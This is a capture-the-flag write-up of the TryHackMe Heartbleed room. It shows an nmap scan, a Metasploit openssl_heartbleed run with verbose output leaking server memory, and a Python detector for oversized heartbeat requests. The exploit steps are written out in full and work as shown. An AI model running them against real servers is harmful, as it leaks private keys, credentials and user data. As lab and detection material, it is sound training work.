https://tryhackme.com/room/heartbleed
💭 Thoughts after doing the room
It’s just a one-step room, but I think Heartbleed is really interesting. That it was possible to get memory contents from a server without any user interaction, with just any SSL service open to the internet, is mindblowing.
I think I read somewhere that this bug was in the wild for around 2 years before it was fixed. Imagine the potential damage. I hope bugs like that are really rare.
Task 1: Background information
I read the background information again and I think I understood the broad concept: there is a mechanism to keep an SSL connection alive. Usually the client sends data to the server, but when the client doesn’t send a payload the server then replies with arbitrary memory that you can use to get data.
Task 2: Protecting Data In Transit
Because the room is named Heartbleed we could just jump straight ahead to an exploit attempt, but let’s first see if there is something else.
root@ip-10-10-24-237:~# nmap -T4 54.216.33.66
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-29 21:10 BST
Nmap scan report for ec2-54-216-33-66.eu-west-1.compute.amazonaws.com (54.216.33.66)
Host is up (0.00083s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds
Ports 80 and 443 are the interesting ones, and there is a page hosting a video.
With no further hint, I’ll just start Metasploit to try the Heartbleed scanner.
On the first try I didn’t see that this module also has a verbose option. After some digging I saw it, and now I could set the right options.
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 54.216.33.66
RHOSTS => 54.216.33.66
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMPFILTER no Pattern to filter leaked memory before storing
LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation
MAX_KEYTRIES 50 yes Max tries to dump key
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS 54.216.33.66 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
STATUS_EVERY 5 yes How many retries until key dump status
THREADS 1 yes The number of concurrent threads (max one per host)
TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)
Auxiliary action:
Name Description
---- -----------
SCAN Check hosts for vulnerability
View the full module info with the info, or info -d command.
Now for the exploit: when you execute it, you’ll get something like this in verbose mode.
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > exploit
[*] 54.216.33.66:443 - Leaking heartbeat response #1
[*] 54.216.33.66:443 - Sending Client Hello...
[*] 54.216.33.66:443 - SSL record #1:
[*] 54.216.33.66:443 - Type: 22
[*] 54.216.33.66:443 - Version: 0x0301
[*] 54.216.33.66:443 - Length: 86
[*] 54.216.33.66:443 - Handshake #1:
[*] 54.216.33.66:443 - Length: 82
[*] 54.216.33.66:443 - Type: Server Hello (2)
[*] 54.216.33.66:443 - Server Hello Version: 0x0301
[*] 54.216.33.66:443 - Server Hello random data: 6e963c439bd0e8eff72c7a096723205f68a16275e5878eed50b1a12fed019ed1
[*] 54.216.33.66:443 - Server Hello Session ID length: 32
[*] 54.216.33.66:443 - Server Hello Session ID: ce1e8f372e8ee75f5d53009ad88a817c7a5f39c11616df1b3ef40855c75b4f3f
[*] 54.216.33.66:443 - SSL record #2:
[*] 54.216.33.66:443 - Type: 22
[*] 54.216.33.66:443 - Version: 0x0301
[*] 54.216.33.66:443 - Length: 951
[*] 54.216.33.66:443 - Handshake #1:
[*] 54.216.33.66:443 - Length: 947
[*] 54.216.33.66:443 - Type: Certificate Data (11)
[*] 54.216.33.66:443 - Certificates length: 944
[*] 54.216.33.66:443 - Data length: 947
[*] 54.216.33.66:443 - Certificate #1:
[*] 54.216.33.66:443 - Certificate #1: Length: 941
[*] 54.216.33.66:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,OU=TryHackMe,O=TryHackMe,L=London,ST=London,C=UK>, issuer=#<OpenSSL::X509::Name CN=localhost,OU=TryHackMe,O=TryHackMe,L=London,ST=London,C=UK>, serial=#<OpenSSL::BN:0x00007faca9481a90>, not_before=2019-02-16 10:41:14 UTC, not_after=2020-02-16 10:41:14 UTC>
[*] 54.216.33.66:443 - SSL record #3:
[*] 54.216.33.66:443 - Type: 22
[*] 54.216.33.66:443 - Version: 0x0301
[*] 54.216.33.66:443 - Length: 331
[*] 54.216.33.66:443 - Handshake #1:
[*] 54.216.33.66:443 - Length: 327
[*] 54.216.33.66:443 - Type: Server Key Exchange (12)
[*] 54.216.33.66:443 - SSL record #4:
[*] 54.216.33.66:443 - Type: 22
[*] 54.216.33.66:443 - Version: 0x0301
[*] 54.216.33.66:443 - Length: 4
[*] 54.216.33.66:443 - Handshake #1:
[*] 54.216.33.66:443 - Length: 0
[*] 54.216.33.66:443 - Type: Server Hello Done (14)
[*] 54.216.33.66:443 - Sending Heartbeat...
[*] 54.216.33.66:443 - Heartbeat response, 44883 bytes
[+] 54.216.33.66:443 - Heartbeat response with leak, 44883 bytes
[*] 54.216.33.66:443 - Printable info leaked:
......d#qp...j...\..c...k.....ca..}..!..f.....".!.9.8.........5.............................3.2.....E.D...../...A....................................... 🤐.......A2../...........................................................................-........@..................................................................................................................................... repeated 15597 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@
The flag is contained within the printable info leaked.
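To make the mechanism from Task 1 concrete, and to show what a defender would flag in the traffic the scanner above generates, here is an added example (my own, not from the room or from Metasploit) that parses raw TLS records and reports heartbeat messages whose declared payload_length exceeds the bytes actually carried, which is the check IDS signatures for this bug rely on. It assumes the input is a raw TLS record stream; the sample bytes are constructed for the demo, not a capture.

```python
import struct
from typing import Iterator, List, Optional, Tuple

TLS_HEARTBEAT = 24   # TLS content type of the heartbeat extension (RFC 6520)
HB_REQUEST = 1       # heartbeat_request; 2 is heartbeat_response
MIN_PADDING = 16     # RFC 6520 requires at least 16 bytes of random padding

def parse_records(data: bytes) -> Iterator[Tuple[int, int, bytes]]:
    """Yield (content_type, version, body) for each complete TLS record in a byte stream."""
    off = 0
    while off + 5 <= len(data):
        ctype, version, length = struct.unpack("!BHH", data[off:off + 5])
        body = data[off + 5:off + 5 + length]
        if len(body) < length:       # truncated capture: stop rather than misparse
            break
        yield ctype, version, body
        off += 5 + length

def check_heartbeat(body: bytes) -> Optional[str]:
    """Return a finding for a heartbeat body, or None when its lengths are consistent.
    A vulnerable server trusts payload_length and echoes that many bytes back, so a
    request that declares more payload than it carries is the Heartbleed pattern."""
    if len(body) < 3:
        return "heartbeat record too short to hold type and payload_length"
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    available = max(len(body) - 3 - MIN_PADDING, 0)   # bytes really present as payload
    if payload_len > available:
        kind = "request" if hb_type == HB_REQUEST else "response"
        return f"{kind} declares payload_length={payload_len} but carries only {available} bytes"
    return None

def scan_stream(data: bytes) -> List[str]:
    """Run the heartbeat check over every record; non-heartbeat records are ignored."""
    findings = []
    for i, (ctype, version, body) in enumerate(parse_records(data), start=1):
        if ctype != TLS_HEARTBEAT:
            continue
        finding = check_heartbeat(body)
        if finding:
            findings.append(f"record #{i} (TLS 0x{version:04x}): {finding}")
    return findings

# Constructed sample stream (not a real capture): a Server Hello Done handshake record,
# a consistent heartbeat request, then a request that declares far more than it carries.
BENIGN_HB = b"\x01" + struct.pack("!H", 4) + b"ping" + b"\x00" * MIN_PADDING
BAD_HB = b"\x01" + struct.pack("!H", 16384) + b"ping"
SAMPLE = (b"\x16\x03\x01" + struct.pack("!H", 4) + b"\x0e\x00\x00\x00"
          + b"\x18\x03\x01" + struct.pack("!H", len(BENIGN_HB)) + BENIGN_HB
          + b"\x18\x03\x01" + struct.pack("!H", len(BAD_HB)) + BAD_HB)
```

Running scan_stream(SAMPLE) skips the handshake record (type 22, as in the verbose output above), accepts the consistent heartbeat and reports only the third record.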